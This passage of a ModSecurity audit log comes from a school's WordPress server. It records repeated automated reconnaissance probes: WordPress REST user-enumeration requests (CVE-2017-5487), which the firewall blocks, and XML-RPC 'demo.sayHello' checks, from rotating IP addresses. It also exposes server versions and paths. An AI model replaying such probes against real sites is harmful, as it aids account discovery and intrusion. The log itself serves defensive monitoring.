"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460282201651 2980 (- - -) Stopwatch2: 1746460282201651 2980; combined=1480, p1=505, p2=944, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28a79f72-Z-- --5f8f8b74-A-- [05/May/2025:22:51:24 +0700] aBjefPZJDMuQndL03JNabwAAAEg 103.236.140.4 38464 103.236.140.4 8181 --5f8f8b74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5f8f8b74-C-- demo.sayHello --5f8f8b74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f8f8b74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460284982488 5669 (- - -) Stopwatch2: 1746460284982488 5669; combined=4251, p1=514, p2=3520, p3=31, p4=34, p5=90, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f8f8b74-Z-- --73dda074-A-- [05/May/2025:22:51:39 +0700] aBjei02V_h1VFAgsfgZ6xQAAAA0 103.236.140.4 38594 103.236.140.4 8181 --73dda074-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73dda074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73dda074-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460299420483 2912 (- - -) Stopwatch2: 1746460299420483 2912; combined=1254, p1=401, p2=820, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73dda074-Z-- --9b968818-A-- [05/May/2025:22:51:42 +0700] aBjejk2V_h1VFAgsfgZ6yQAAABg 103.236.140.4 38618 103.236.140.4 8181 --9b968818-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b968818-C-- demo.sayHello --9b968818-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b968818-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460302199890 5808 (- - -) Stopwatch2: 1746460302199890 5808; combined=4284, p1=540, p2=3506, p3=32, p4=45, p5=95, sr=74, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b968818-Z-- --9af5d92d-A-- [05/May/2025:22:51:56 +0700] aBjenPZJDMuQndL03JNajAAAAEk 103.236.140.4 38726 103.236.140.4 8181 --9af5d92d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9af5d92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9af5d92d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460316439675 2701 (- - -) Stopwatch2: 1746460316439675 2701; combined=1255, p1=408, p2=819, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9af5d92d-Z-- --87e1206d-A-- [05/May/2025:22:51:59 +0700] aBjen4ZWvR7-42f6JrALZwAAANc 103.236.140.4 38754 103.236.140.4 8181 --87e1206d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.61 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87e1206d-C-- demo.sayHello --87e1206d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87e1206d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460319246755 6892 (- - -) Stopwatch2: 1746460319246755 6892; combined=4962, p1=690, p2=3983, p3=39, p4=43, p5=136, sr=135, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87e1206d-Z-- --c97f7d24-A-- [05/May/2025:22:52:10 +0700] aBjeqvZJDMuQndL03JNamQAAAEk 103.236.140.4 38834 103.236.140.4 8181 --c97f7d24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c97f7d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c97f7d24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460330376221 2678 (- - -) Stopwatch2: 1746460330376221 2678; combined=1218, p1=394, p2=788, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c97f7d24-Z-- --fb82e35b-A-- [05/May/2025:22:52:13 +0700] aBjerfZJDMuQndL03JNanAAAAFY 103.236.140.4 38850 103.236.140.4 8181 --fb82e35b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb82e35b-C-- demo.sayHello --fb82e35b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb82e35b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460333193076 6180 (- - -) Stopwatch2: 1746460333193076 6180; combined=4509, p1=552, p2=3727, p3=32, p4=33, p5=96, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb82e35b-Z-- --4613561c-A-- [05/May/2025:22:53:52 +0700] aBjfEPZJDMuQndL03JNa0QAAAFI 103.236.140.4 39662 103.236.140.4 8181 --4613561c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4613561c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4613561c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460432011247 3350 (- - -) Stopwatch2: 1746460432011247 3350; combined=1433, p1=486, p2=914, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4613561c-Z-- --b55ef345-A-- [05/May/2025:22:53:54 +0700] aBjfEoZWvR7-42f6JrALlwAAANM 103.236.140.4 39684 103.236.140.4 8181 --b55ef345-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b55ef345-C-- demo.sayHello --b55ef345-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b55ef345-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460434869500 5611 (- - -) Stopwatch2: 1746460434869500 5611; combined=4178, p1=521, p2=3434, p3=31, p4=36, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b55ef345-Z-- --6bf7f213-A-- [05/May/2025:22:54:18 +0700] aBjfKgRwKNFSM6B7_Lae_wAAAIU 103.236.140.4 39888 103.236.140.4 8181 --6bf7f213-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6bf7f213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bf7f213-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460458736253 2817 (- - -) Stopwatch2: 1746460458736253 2817; combined=1417, p1=453, p2=933, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bf7f213-Z-- --f8a9102c-A-- [05/May/2025:22:54:21 +0700] aBjfLfZJDMuQndL03JNa7wAAAEg 103.236.140.4 39908 103.236.140.4 8181 --f8a9102c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8a9102c-C-- demo.sayHello --f8a9102c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8a9102c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460461529804 5680 (- - -) Stopwatch2: 1746460461529804 5680; combined=4142, p1=527, p2=3391, p3=33, p4=35, p5=92, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8a9102c-Z-- --002c9d37-A-- [05/May/2025:22:54:40 +0700] aBjfQE2V_h1VFAgsfgZ7KgAAAAI 103.236.140.4 40090 103.236.140.4 8181 --002c9d37-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --002c9d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --002c9d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460480260221 2211 (- - -) Stopwatch2: 1746460480260221 2211; combined=1187, p1=384, p2=772, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --002c9d37-Z-- --bbf92c58-A-- [05/May/2025:22:54:43 +0700] aBjfQ02V_h1VFAgsfgZ7MgAAAAA 103.236.140.4 40118 103.236.140.4 8181 --bbf92c58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbf92c58-C-- demo.sayHello --bbf92c58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbf92c58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460483440926 6857 (- - -) Stopwatch2: 1746460483440926 6857; combined=5135, p1=649, p2=4210, p3=74, p4=42, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbf92c58-Z-- --1c032129-A-- [05/May/2025:22:55:24 +0700] aBjfbE2V_h1VFAgsfgZ7WQAAAA4 103.236.140.4 40448 103.236.140.4 8181 --1c032129-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c032129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c032129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460524819655 2545 (- - -) Stopwatch2: 1746460524819655 2545; combined=1291, p1=395, p2=868, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c032129-Z-- --57f6a270-A-- [05/May/2025:22:55:27 +0700] aBjfb02V_h1VFAgsfgZ7YwAAABg 103.236.140.4 40484 103.236.140.4 8181 --57f6a270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57f6a270-C-- demo.sayHello --57f6a270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57f6a270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460527850622 5346 (- - -) Stopwatch2: 1746460527850622 5346; combined=4323, p1=491, p2=3601, p3=32, p4=36, p5=96, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57f6a270-Z-- --3b28246a-A-- [05/May/2025:22:55:30 +0700] aBjfcvZJDMuQndL03JNa_gAAAE0 103.236.140.4 40520 103.236.140.4 8181 --3b28246a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b28246a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b28246a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460530108776 2565 (- - -) Stopwatch2: 1746460530108776 2565; combined=1274, p1=424, p2=821, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b28246a-Z-- --68739876-A-- [05/May/2025:22:55:32 +0700] aBjfdE2V_h1VFAgsfgZ7awAAAAc 103.236.140.4 40556 103.236.140.4 8181 --68739876-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68739876-C-- demo.sayHello --68739876-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68739876-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 